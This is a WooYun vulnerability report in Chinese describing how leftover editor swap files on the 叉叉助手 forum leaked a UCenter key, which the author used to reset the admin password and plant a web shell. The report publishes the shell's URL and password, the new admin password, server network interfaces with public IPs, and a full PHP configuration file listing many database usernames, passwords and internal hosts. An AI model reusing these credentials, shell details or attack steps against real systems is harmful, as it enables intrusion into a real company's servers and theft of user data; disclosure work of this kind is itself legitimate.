当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2016-177539

漏洞标题: 叉叉助手某处信息泄露导致Getshell

相关厂商: xxzhushou.cn

漏洞作者: mango

提交时间: 2016-02-21 22:45

公开时间: 2016-03-07 01:11

漏洞类型: 敏感信息泄露

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 敏感信息泄露

2人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经确认,细节仅向厂商公开
2016-03-03: 细节向核心白帽子及相关领域专家公开
2016-03-13: 细节向普通白帽子公开
2016-03-23: 细节向实习白帽子公开
2016-03-07: 细节向公众公开

简要描述:

厂商又活了,看到要送礼物了,那就来几发漏洞吧。

详细说明:

问题出现在论坛问题

http://bbs.xxzhushou.cn/config/.config_ucenter.php.swp

http://bbs.xxzhushou.cn/uc_server/data/.config.inc.php.swp

这两个备份没删除

F(PTE${OVGD9AJ{{N6B$GLO.png



VXYIVPX6([RKIC)8}%]US14.png



看到泄露了key 尝试是否有效

M8`(7{$)XHQ}A5IZ[]QU{{F.png



可以 key 可以用我通过key修改了后台管理员密码 admin 密码是mango1995

]NANN_HC%YUGMM56X}$BR_8.png



然后通过

http://wooyun.org/bugs/wooyun-2014-065559

getshell

http://bbs.xxzhushou.cn/0.php 密码a

KH2SS0M`@{IN@XJW7Z2VN%4.png



漏洞证明:

执行命令发现在好多网络中~

code 区域
[/data/web/xxzhushou/bbs/]$ /sbin/ifconfig
em1 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:14.18.239.130 Bcast:14.18.239.255 Mask:255.255.255.128
inet6 addr: fe80::f21f:afff:fed8:e1a6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:46107535393 errors:0 dropped:243 overruns:0 frame:10303
TX packets:47409899906 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:16078038561918 (14.6 TiB) TX bytes:17325631484183 (15.7 TiB)
Interrupt:16

em1:0 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:122.13.72.194 Bcast:122.13.72.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:1 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:183.232.69.157 Bcast:183.232.69.159 Mask:255.255.255.224
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:2 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:192.168.1.130 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

em1:3 Link encap:Ethernet HWaddr F0:1F:AF:D8:E1:A6
inet addr:183.232.5.146 Bcast:183.232.5.159 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:16

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:11999976233 errors:0 dropped:0 overruns:0 frame:0
TX packets:11999976233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6578621050766 (5.9 TiB) TX bytes:6578621050766 (5.9 TiB)





果断尝试之前找到的那些泄露的问题

code 区域
<?php


/////////////////////////////////////////////////////////////////////
// 设计思路:将数据库读操作,和数据库写操作,完全分离开来,使用不同的连接参数,可以分别连到不同服务器上的数据库。
// 数据库连接函数,根据参数数组,依次尝试连接数据库,直到某个连接成功为止,或者全部失败。
/////////////////////////////////////////////////////////////////////

$DB_CONFIG = array(
'read' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
//多个从库在这里填写
),
'write' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'analytics',
'charset' => 'utf8'
)
),
'api_backend' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'testXXDb',
'password' => 'testXXDb123',
'port' => 3306,
'dbname' => 'testXXDb',
'charset' => 'utf8'
)
),
'api_feedback' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.130',
'user' => 'api_flamingo',
'password' => 'lad9Ad9@3^ladk*A',
'port' => 3306,
'dbname' => 'XXFeedBack',
'charset' => 'utf8'
)
),
'analyticsUser' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.130',
'user' => 'analytics',
'password' => 'xxanal123&*(',
'port' => 3306,
'dbname' => 'XXUser',
'charset' => 'utf8'
)
),
'statistics' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'XXStatistics',
'charset' => 'utf8'
)
),
'package' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'package',
'charset' => 'utf8'
)
),
'eventlog' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxstatistics',
'password' => 'xxst123789',
'port' => 3306,
'dbname' => 'eventlog',
'charset' => 'utf8',
'persistency' => true
)
),
'bbs' => array(
array('dbms' => 'mysql',
'host' => '192.168.1.131',
'user' => 'xxbbs',
'password' => 'xxBbs789!3',
'port' => 3306,
'dbname' => 'XXBbs',
'charset' => 'utf8',
)
),
'bbs2' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'mydiscuz',
'charset' => 'utf8',
)
),
'test' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'test',
'charset' => 'utf8',
)
),
'statistics' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxserver',
'charset' => 'utf8',
)
),
'api_backend' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxserver',
'charset' => 'utf8',
)
),

'testUserWrite' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.131',
'user' => 'testXXUser',
'password' => 'testXXUser123',
'port' => 3306,
'dbname' => 'testXXUser',
'charset' => 'utf8'
),
),
'testGuopan1' => array(
array('dbms' => 'mysql',
'host' => '14.18.239.131',
'user' => 'testGuopan',
'password' => 'testGp123@',
'port' => 3306,
'dbname' => 'testGuopan',
'charset' => 'utf8'
),
),
'testGuopan' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'test',
'charset' => 'utf8'
),
),
'guopan' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'guopan',
'charset' => 'utf8'
),
),
'xxcms' => array(
array('dbms' => 'mysql',
'host' => 'localhost',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'xxcms',
'charset' => 'utf8'
),
),
'oobbs' => array(
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'oobbs',
'charset' => 'utf8'
),
),
'datastat' => array(// 频道数据统计
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'datasta',
'charset' => 'utf8'
),
),
'gpbbs' => array(// 频道数据统计
array('dbms' => 'mysql',
'host' => '127.0.0.1',
'user' => 'root',
'password' => '',
'port' => 3306,
'dbname' => 'gpbbs',
'charset' => 'utf8'
),
),
//更多数据库在这里填写
);

/////////////////////////////////////////////////////////////////////
//缓存配置, use_config 为0表示使用第一项配置,为1表示使用第2项
$CACHE_CONFIG = array(
'use_config' => 'file' ,
'memcache' =>
array('type' => 'memcache',
'server' => array(
// array('host' =>'server1', 'port' => '11211', 'weight' => '10'),
array('host' =>'192.168.1.130', 'port' => '11211', 'weight' => '10')
),
'ttl' => 7200,
'compress' => false,
),
'file' =>
array('type' => 'file',
'cache_dir'=> SYSDIR_CACHE . '/tmp/',
'ttl' => 600,
)
);

/////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////
//SESSION配置, use_config 为0表示使用第一项配置,为1表示使用第2项
$SESSION_CONFIG = array(
'use_config' => 'files' ,
'memcache' =>
array('type' => 'memcache',
'save_path' => 'tcp://192.168.1.130:11210',
'cache_expire' => 7200, //minutes
),
'files' =>
array('type' => 'files',
'save_path' => SYSDIR_CACHE . '/sessions/',
'cache_expire' => 180, //minutes
)
);
/////////////////////////////////////////////////////////////////////
//REDIS配置 主要用于统计类的集合
$REDIS_CONFIG = array(
'write' => array(
array(
'host' => '127.0.0.1',
'port' => '6379',
'password' => '',
),
),
'read' => array(
array(
'host' => '127.0.0.1',
'port' => '6379',
'password' => '',
),
),
'api' => array(
array(
'host' => '192.168.1.132',
'port' => '6379',
'password' => '',
),
),
'testUser' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'password' => '',
),
),
'user' => array(
array(
'host' => '192.168.1.130',
'port' => '6379',
'password' => '',
),
),
'testDm_level' => array(
array(
'host' => '192.168.1.131',
'port' => '6379',
'dbN' => 1,
'password' => '',
),
),
);
?>



9~`T1LU]5UH__ENUUS`828H.png



I0RATM%2R2TP4X85H9F[Q1Y.png



TJGWBSQ6~6%4{4{%]R15J%K.png





99CPMR`P%Z_IKFO6D`8[8BN.png

修复方案:

及时删除这些备份的文件~加强线上安全

版权声明:转载请注明来源 mango@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-02-22 12:28

厂商回复:

我们将在下个版本对bbs进行全面的处理

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-02-22 14:16 | Mayter ( 普通白帽子 | Rank:165 漏洞数:40 | 笼鸡有食汤锅近,野鹤无粮天地宽.)
    1

    。。666

登录后才能发表评论,请先 登录